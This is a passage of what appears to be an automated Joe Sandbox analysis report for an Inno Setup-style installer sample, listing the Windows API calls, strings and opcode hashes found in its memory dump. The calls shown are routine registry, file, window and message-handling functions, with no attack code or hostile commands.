                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: Close
                                                              • String ID: RegisteredOrganization$RegisteredOwner
                                                              • API String ID: 3535843008-1113070880
                                                              • Opcode ID: 3cef9cafc9ae7832fbb6eaa2bd4d40f0f71bbb09bcea78efdfdb807f20eb42b3
                                                              • Instruction ID: cd6b81515cbcb541a42d20c803a6709c30f964b406f28b15d8fe69fce277d2ff
                                                              • Opcode Fuzzy Hash: 3cef9cafc9ae7832fbb6eaa2bd4d40f0f71bbb09bcea78efdfdb807f20eb42b3
                                                              • Instruction Fuzzy Hash: 41F09030704204ABEB00D669ECD2BAA33A99746304F60C03FA9088B392D6799E01CB5C
                                                              APIs
                                                              • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000000,?,004756F3), ref: 004754E1
                                                              • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000000,?,004756F3), ref: 004754F8
                                                                • Part of subcall function 00453488: GetLastError.KERNEL32(00000000,0045401D,00000005,00000000,00454052,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,00497D75,00000000), ref: 0045348B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: CloseCreateErrorFileHandleLast
                                                              • String ID: CreateFile
                                                              • API String ID: 2528220319-823142352
                                                              • Opcode ID: fa36eb7f5e292efbad873286b983b31a245b5f10299435e2a562660d120c4ecb
                                                              • Instruction ID: 40e201e46ebb19b1d9bf90fbf766f72b309683208074062896c4944ddf319cda
                                                              • Opcode Fuzzy Hash: fa36eb7f5e292efbad873286b983b31a245b5f10299435e2a562660d120c4ecb
                                                              • Instruction Fuzzy Hash: CDE065702403447FDA10F769CCC6F4577889B14729F10C155B5446F3D2C5B9EC408628
                                                              APIs
                                                              • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,c6H,?,00000001,?,?,00483663,?,00000001,00000000), ref: 0042DE48
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: Open
                                                              • String ID: System\CurrentControlSet\Control\Windows$c6H
                                                              • API String ID: 71445658-1548894351
                                                              • Opcode ID: 532c08fc3a5ebe879a42036bede715a90f251433598981f36561c2967c82051c
                                                              • Instruction ID: b14c86e398362f8621ba381b59967aff518ca924b2daa5b46ce173f8349262a2
                                                              • Opcode Fuzzy Hash: 532c08fc3a5ebe879a42036bede715a90f251433598981f36561c2967c82051c
                                                              • Instruction Fuzzy Hash: BFD0C772950128BBDB00DA89DC41DFB775DDB15760F45441BFD049B141C1B4EC5197F8
                                                              APIs
                                                                • Part of subcall function 00456E7C: CoInitialize.OLE32(00000000), ref: 00456E82
                                                                • Part of subcall function 0042E3A4: SetErrorMode.KERNEL32(00008000), ref: 0042E3AE
                                                                • Part of subcall function 0042E3A4: LoadLibraryA.KERNEL32(00000000,00000000,0042E3F8,?,00000000,0042E416,?,00008000), ref: 0042E3DD
                                                              • GetProcAddress.KERNEL32(00000000,SHCreateItemFromParsingName), ref: 00456F10
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: AddressErrorInitializeLibraryLoadModeProc
                                                              • String ID: SHCreateItemFromParsingName$shell32.dll
                                                              • API String ID: 2906209438-2320870614
                                                              • Opcode ID: 22a7af04fdfb7e1cbc8590484576be710a33bf4538556d1874791685a96bf942
                                                              • Instruction ID: 6d1f0b9ea2f83cf17b9d56af39d37ffc4890966232cc80b75afa5f9be50b51f8
                                                              • Opcode Fuzzy Hash: 22a7af04fdfb7e1cbc8590484576be710a33bf4538556d1874791685a96bf942
                                                              • Instruction Fuzzy Hash: 97C04CA1B4169096CB00B7FAA54361F2414DB5075FB96C07FBD40BB687CE7D8848AA2E
                                                              APIs
                                                                • Part of subcall function 0042E3A4: SetErrorMode.KERNEL32(00008000), ref: 0042E3AE
                                                                • Part of subcall function 0042E3A4: LoadLibraryA.KERNEL32(00000000,00000000,0042E3F8,?,00000000,0042E416,?,00008000), ref: 0042E3DD
                                                              • GetProcAddress.KERNEL32(00000000,SHPathPrepareForWriteA), ref: 0046D0AD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: AddressErrorLibraryLoadModeProc
                                                              • String ID: SHPathPrepareForWriteA$shell32.dll
                                                              • API String ID: 2492108670-2683653824
                                                              • Opcode ID: 4bfb7ae62aec4cae49a8b0683f2b36ac3bef8159a448d5ae1ca26c94081968f3
                                                              • Instruction ID: 608de25eae135e4754017d8cf95b07e3007941af04aa8fd5541e4ba3120ba520
                                                              • Opcode Fuzzy Hash: 4bfb7ae62aec4cae49a8b0683f2b36ac3bef8159a448d5ae1ca26c94081968f3
                                                              • Instruction Fuzzy Hash: 69B092E0F056008ACF00A7F6984260A10059B8071DF90807B7440BB395EA3E840AAB6F
                                                              APIs
                                                              • LoadLibraryExA.KERNEL32(00000000,00000000,00000008,?,?,00000000,00448719), ref: 0044865C
                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 004486DD
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: AddressLibraryLoadProc
                                                              • String ID:
                                                              • API String ID: 2574300362-0
                                                              • Opcode ID: 9e6f6b39164a2250cf52a4aeb4930d02d61dfc433358958cd5631fa5a9f36d71
                                                              • Instruction ID: bcb50df029510264ac3c8269deb9aca16d778d72fab4f9fb4f479d94b6d7f3fe
                                                              • Opcode Fuzzy Hash: 9e6f6b39164a2250cf52a4aeb4930d02d61dfc433358958cd5631fa5a9f36d71
                                                              • Instruction Fuzzy Hash: 09514170A00105AFDB40EFA5C491A9EBBF9EB54315F11817EA414BB392DA389E05CB99
                                                              APIs
                                                              • GetSystemMenu.USER32(00000000,00000000,00000000,0048183C), ref: 004817D4
                                                              • AppendMenuA.USER32(00000000,00000800,00000000,00000000), ref: 004817E5
                                                              • AppendMenuA.USER32(00000000,00000000,0000270F,00000000), ref: 004817FD
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: Menu$Append$System
                                                              • String ID:
                                                              • API String ID: 1489644407-0
                                                              • Opcode ID: 700b5811d02ba2ff172c742152fb081413fabfeab2321fa183ac7a2ab913d185
                                                              • Instruction ID: b36482c1273671328963914ac1a7ecaae55131090c894365c145815d0470a156
                                                              • Opcode Fuzzy Hash: 700b5811d02ba2ff172c742152fb081413fabfeab2321fa183ac7a2ab913d185
                                                              • Instruction Fuzzy Hash: 02318E307043445AD721FB359D82BAE3A989B15318F54593FB900AA3E3CA7C9C4A87AD
                                                              APIs
                                                              • 74D41520.VERSION(00000000,?,?,?,004972D0), ref: 0045251C
                                                              • 74D41500.VERSION(00000000,?,00000000,?,00000000,00452597,?,00000000,?,?,?,004972D0), ref: 00452549
                                                              • 74D41540.VERSION(?,004525C0,?,?,00000000,?,00000000,?,00000000,00452597,?,00000000,?,?,?,004972D0), ref: 00452563
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: D41500D41520D41540
                                                              • String ID:
                                                              • API String ID: 2153611984-0
                                                              • Opcode ID: 386d1b7d14527d93b72562f1672999fd2f5aa3ff7ed0da5cad2ac492ae89063e
                                                              • Instruction ID: b47a7e64509d5cca070909842564d4f4e78a1d1ae8fea26b0cdd83eea50adb12
                                                              • Opcode Fuzzy Hash: 386d1b7d14527d93b72562f1672999fd2f5aa3ff7ed0da5cad2ac492ae89063e
                                                              • Instruction Fuzzy Hash: 6B218371A00148AFDB01DAA989519AFB7FCEB4A300F55447BFC00E3342E6B99E04CB65
                                                              APIs
                                                              • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00424422
                                                              • TranslateMessage.USER32(?), ref: 0042449F
                                                              • DispatchMessageA.USER32(?), ref: 004244A9
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: Message$DispatchPeekTranslate
                                                              • String ID:
                                                              • API String ID: 4217535847-0
                                                              • Opcode ID: 57886541ca2a25700c9c74098ac3e1b954634baf7139c1061c5cdbc3fad4e66a
                                                              • Instruction ID: 520fb342982be2dd3794930026bb259c1cd38a4fe19eb968f01b3c53081bdda3
                                                              • Opcode Fuzzy Hash: 57886541ca2a25700c9c74098ac3e1b954634baf7139c1061c5cdbc3fad4e66a
                                                              • Instruction Fuzzy Hash: 781191307043205AEE20FA64AD41B9B73D4DFD1708F80481EF9D997382D77D9E49879A
                                                              APIs
                                                              • SetPropA.USER32(00000000,00000000), ref: 0041667A
                                                              • SetPropA.USER32(00000000,00000000), ref: 0041668F
                                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,00000000,00000000,?,00000000,00000000), ref: 004166B6
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: Prop$Window
                                                              • String ID:
                                                              • API String ID: 3363284559-0
                                                              • Opcode ID: c3da473eafe02ab8e789e0609dcd6af1eaad0cb973784c7fd29191cc4dc7f6ad
                                                              • Instruction ID: 2262f6f032fbfc8c948eb6af5e1566575da4c35a9ecfa624f63ddadf83d7b404
                                                              • Opcode Fuzzy Hash: c3da473eafe02ab8e789e0609dcd6af1eaad0cb973784c7fd29191cc4dc7f6ad
                                                              • Instruction Fuzzy Hash: E3F0B271701210ABD710AB599C85FA632DCAB09719F160176BD09EF286C778DC40C7A8
                                                              APIs
                                                              • IsWindowVisible.USER32(?), ref: 0041EE74
                                                              • IsWindowEnabled.USER32(?), ref: 0041EE7E
                                                              • EnableWindow.USER32(?,00000000), ref: 0041EEA4
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: Window$EnableEnabledVisible
                                                              • String ID:
                                                              • API String ID: 3234591441-0
                                                              • Opcode ID: 8d68ea6b8e39d06ec6ae2b778d87487b924e250a5b1b44c5d2ba2f9a93d60018
                                                              • Instruction ID: eab114e884733e02e348d5fb54c1eeaedaab2d2a8f53f62e6f3f1b5b82b3488b
                                                              • Opcode Fuzzy Hash: 8d68ea6b8e39d06ec6ae2b778d87487b924e250a5b1b44c5d2ba2f9a93d60018
                                                              • Instruction Fuzzy Hash: 90E0EDB9100300AAE711AB2BEC81A57769CBB94314F45843BAC099B293DA3EDC409B78
                                                              APIs
                                                              • SetActiveWindow.USER32(?), ref: 0046A378
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: ActiveWindow
                                                              • String ID: PrepareToInstall
                                                              • API String ID: 2558294473-1101760603
                                                              • Opcode ID: 2f09c314b6fb54b1472f2c84d4998d1c671ccdc982530a6e1a6c91392ff97de1
                                                              • Instruction ID: 163d609461ff3b9580316b21a780dec1cd9204125e937a74b025edb926540d27
                                                              • Opcode Fuzzy Hash: 2f09c314b6fb54b1472f2c84d4998d1c671ccdc982530a6e1a6c91392ff97de1
                                                              • Instruction Fuzzy Hash: 90A10A34A00109DFCB00EB99D985EEEB7F5AF88304F1580B6E404AB362D738AE45DF59
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: /:*?"<>|
                                                              • API String ID: 0-4078764451
                                                              • Opcode ID: daa5e4ec58dfd3a4f8b67407405db92af73f638a584e66193a323fc2660a566c
                                                              • Instruction ID: b706238f5af82f8a54f925a22e06db4ee79b372672e861a4edd763b161806009
                                                              • Opcode Fuzzy Hash: daa5e4ec58dfd3a4f8b67407405db92af73f638a584e66193a323fc2660a566c
                                                              • Instruction Fuzzy Hash: 6F7197B0B44244AADB20E766DCC2BEE77A19F41704F108167F5807B392E7B99D45878E
                                                              APIs
                                                              • SetActiveWindow.USER32(?), ref: 004820FE
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: ActiveWindow
                                                              • String ID: InitializeWizard
                                                              • API String ID: 2558294473-2356795471
                                                              • Opcode ID: 4cb1695e49b1b07e3586b425a713be07569947560fbf0fba233168fdeef3d44e
                                                              • Instruction ID: b8891c381381d1a0014b65a4ce29d1dfbbdf9d421e77ac889de6892087eb3363
                                                              • Opcode Fuzzy Hash: 4cb1695e49b1b07e3586b425a713be07569947560fbf0fba233168fdeef3d44e
                                                              • Instruction Fuzzy Hash: BE118234205204DFD711EBA5FE96B2977E4EB55314F20143BE5008B3A1DA796C50CB6D
                                                              APIs
                                                                • Part of subcall function 0042DE2C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,c6H,?,00000001,?,?,00483663,?,00000001,00000000), ref: 0042DE48
                                                              • RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,?,?,0047C472,00000000,0047C5AC), ref: 0047C271
                                                              Strings
                                                              • Software\Microsoft\Windows\CurrentVersion, xrefs: 0047C241
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: CloseOpen
                                                              • String ID: Software\Microsoft\Windows\CurrentVersion
                                                              • API String ID: 47109696-1019749484
                                                              • Opcode ID: 6e2d5090e95b4c6fabdd9168d7cad944b3593745ae6ad0b3bb6d2af319e0c910
                                                              • Instruction ID: 70811ca8e083c9a3dbfae153db117623eb743e792d78c4ccda021ebaf15ccddc
                                                              • Opcode Fuzzy Hash: 6e2d5090e95b4c6fabdd9168d7cad944b3593745ae6ad0b3bb6d2af319e0c910
                                                              • Instruction Fuzzy Hash: 8EF08931B0411467DA00A5DA5C82B9E56DD8B55758F20407FF508EB253D9B99D02036C
                                                              APIs
                                                              • RegSetValueExA.ADVAPI32(?,Inno Setup: Setup Version,00000000,00000001,00000000,00000001,004763FA,?,0049C1D0,?,0046F403,?,00000000,0046F99E,?,_is1), ref: 0046F10F
                                                              Strings
                                                              • Inno Setup: Setup Version, xrefs: 0046F10D
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: Value
                                                              • String ID: Inno Setup: Setup Version
                                                              • API String ID: 3702945584-4166306022
                                                              • Opcode ID: 734ac0f1c1098741eb0e60cbf617dbc9041c5452899e61f021b18629f5aca0fc
                                                              • Instruction ID: 253732d940e31991125f8b939195b5ca02eb4333684dc2ddbbcc15e62aa31341
                                                              • Opcode Fuzzy Hash: 734ac0f1c1098741eb0e60cbf617dbc9041c5452899e61f021b18629f5aca0fc
                                                              • Instruction Fuzzy Hash: 3BE06D713012047FD710AA6B9C85F5BBADDDF993A5F10403AB908DB392D578DD4081A8
                                                              APIs
                                                              • RegSetValueExA.ADVAPI32(?,NoModify,00000000,00000004,00000000,00000004,00000001,?,0046F7DA,?,?,00000000,0046F99E,?,_is1,?), ref: 0046F16F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: Value
                                                              • String ID: NoModify
                                                              • API String ID: 3702945584-1699962838
                                                              • Opcode ID: 14b653d2795b3180ab09acf432715bdcca8a399851f75d04a8bb0bb30e96b91c
                                                              • Instruction ID: dfbc78ba79a393f528aadc4bccb3a1e1d52346a2df28baf9fde3d1272b39f611
                                                              • Opcode Fuzzy Hash: 14b653d2795b3180ab09acf432715bdcca8a399851f75d04a8bb0bb30e96b91c
                                                              • Instruction Fuzzy Hash: D8E04FB4604304BFEB04DB55DD4AF6B77ECDB48750F10415ABA04DB281E674EE00C668
                                                              APIs
                                                              • GetACP.KERNEL32(?,?,00000001,00000000,0047E25F,?,-0000001A,004800D8,-00000010,?,00000004,0000001B,00000000,00480425,?,0045DECC), ref: 0047DFF6
                                                                • Part of subcall function 0042E32C: 73A1A570.USER32(00000000,00000000,0048048C,?,?,00000001,00000000,00000002,00000000,00480D8E,?,?,?,?,?,004986AB), ref: 0042E33B
                                                                • Part of subcall function 0042E32C: EnumFontsA.GDI32(?,00000000,0042E318,00000000,00000000,0042E384,?,00000000,00000000,0048048C,?,?,00000001,00000000,00000002,00000000), ref: 0042E366
                                                                • Part of subcall function 0042E32C: 73A1A480.USER32(00000000,?,0042E38B,00000000,00000000,0042E384,?,00000000,00000000,0048048C,?,?,00000001,00000000,00000002,00000000), ref: 0042E37E
                                                              • SendNotifyMessageA.USER32(00020424,00000496,00002711,-00000001), ref: 0047E1C6
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
